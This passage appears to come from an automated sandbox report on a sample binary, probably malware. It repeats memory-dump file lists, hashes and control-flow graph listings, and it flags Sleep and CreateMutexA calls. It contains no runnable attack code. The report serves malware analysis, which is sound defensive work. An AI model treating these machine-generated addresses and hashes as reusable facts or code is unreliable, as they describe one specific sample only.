                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 2c2d7bb0436ecf017ec7413e319c39cc57c57be28ea59bc563d286c658d95f53
                                                                                                                                                                                                                                                                • Instruction ID: a237e0e3ff1b97e323fc0a5467fbac45abb3d66df61f8510144be18e690142b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c2d7bb0436ecf017ec7413e319c39cc57c57be28ea59bc563d286c658d95f53
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC314A316001458BEB09DB79DCC9BADB766EBC6314F248618F414DB3F6CB75AD808716

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 387 9ea682-9ea6a2 391 9ea6a4-9ea6b0 387->391 392 9ea6d0-9ea6ec 387->392 393 9ea6c6-9ea6cd call 9fd663 391->393 394 9ea6b2-9ea6c0 391->394 395 9ea6ee-9ea6fa 392->395 396 9ea71a-9ea739 392->396 393->392 394->393 399 9ea949 394->399 401 9ea6fc-9ea70a 395->401 402 9ea710-9ea717 call 9fd663 395->402 397 9ea73b-9ea747 396->397 398 9ea767-9ea916 call 9f80c0 396->398 405 9ea75d-9ea764 call 9fd663 397->405 406 9ea749-9ea757 397->406 403 9ea94e-9ea994 call a16c6a Sleep CreateMutexA 399->403 404 9ea949 call a16c6a 399->404 401->399 401->402 402->396 419 9ea996-9ea998 403->419 420 9ea9a7-9ea9a8 403->420 404->403 405->398 406->399 406->405 419->420 421 9ea99a-9ea9a5 419->421 421->420
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 7a6114e29618656f5d37f7edf9ba69a560aeba1a70f4df5867bd556dea873778
                                                                                                                                                                                                                                                                • Instruction ID: 73ee8771962b2e1e9b680133cb6fe9b782b4e510cfcd4c45eb7eb11a459ba35c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a6114e29618656f5d37f7edf9ba69a560aeba1a70f4df5867bd556dea873778
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C316A31A001848BEB09DB79DCC97ADB776EBC2314F248618E414DB2F6C776AD808756

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 423 9e9adc-9e9ae8 424 9e9afe-9e9b27 call 9fd663 423->424 425 9e9aea-9e9af8 423->425 432 9e9b29-9e9b35 424->432 433 9e9b55-9e9b57 424->433 425->424 426 9ea917 425->426 429 9ea953-9ea994 Sleep CreateMutexA 426->429 430 9ea917 call a16c6a 426->430 439 9ea996-9ea998 429->439 440 9ea9a7-9ea9a8 429->440 430->429 435 9e9b4b-9e9b52 call 9fd663 432->435 436 9e9b37-9e9b45 432->436 437 9e9b59-9ea916 call 9f80c0 433->437 438 9e9b65-9e9d91 call 9f7a00 call 9e5c10 call 9e8b30 call 9f8220 call 9f7a00 call 9e5c10 call 9e8b30 call 9f8220 433->438 435->433 436->426 436->435 439->440 444 9ea99a-9ea9a5 439->444 444->440
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 0c154c9799ebab7da7a7ce15ae469c16e1d44d0c34784d514ba9fbaf7231235b
                                                                                                                                                                                                                                                                • Instruction ID: 5afe275b55cbea6b8c2a35f08a296bad8dbaa0bdb69f0471165dd6c4d389781e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c154c9799ebab7da7a7ce15ae469c16e1d44d0c34784d514ba9fbaf7231235b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A42179327042409BEB199B69ECC5B6DB366EBD1310F244219E404CB6E6DB76AE808711

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 500 9ea856-9ea86e 501 9ea89c-9ea89e 500->501 502 9ea870-9ea87c 500->502 503 9ea8a9-9ea8b1 call 9e7d30 501->503 504 9ea8a0-9ea8a7 501->504 505 9ea87e-9ea88c 502->505 506 9ea892-9ea899 call 9fd663 502->506 516 9ea8e4-9ea8e6 503->516 517 9ea8b3-9ea8bb call 9e7d30 503->517 507 9ea8eb-9ea916 call 9f80c0 504->507 505->506 509 9ea94e-9ea987 call a16c6a Sleep CreateMutexA 505->509 506->501 521 9ea98e-9ea994 509->521 516->507 517->516 522 9ea8bd-9ea8c5 call 9e7d30 517->522 523 9ea996-9ea998 521->523 524 9ea9a7-9ea9a8 521->524 522->516 528 9ea8c7-9ea8cf call 9e7d30 522->528 523->524 526 9ea99a-9ea9a5 523->526 526->524 528->516 532 9ea8d1-9ea8d9 call 9e7d30 528->532 532->516 535 9ea8db-9ea8e2 532->535 535->507
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
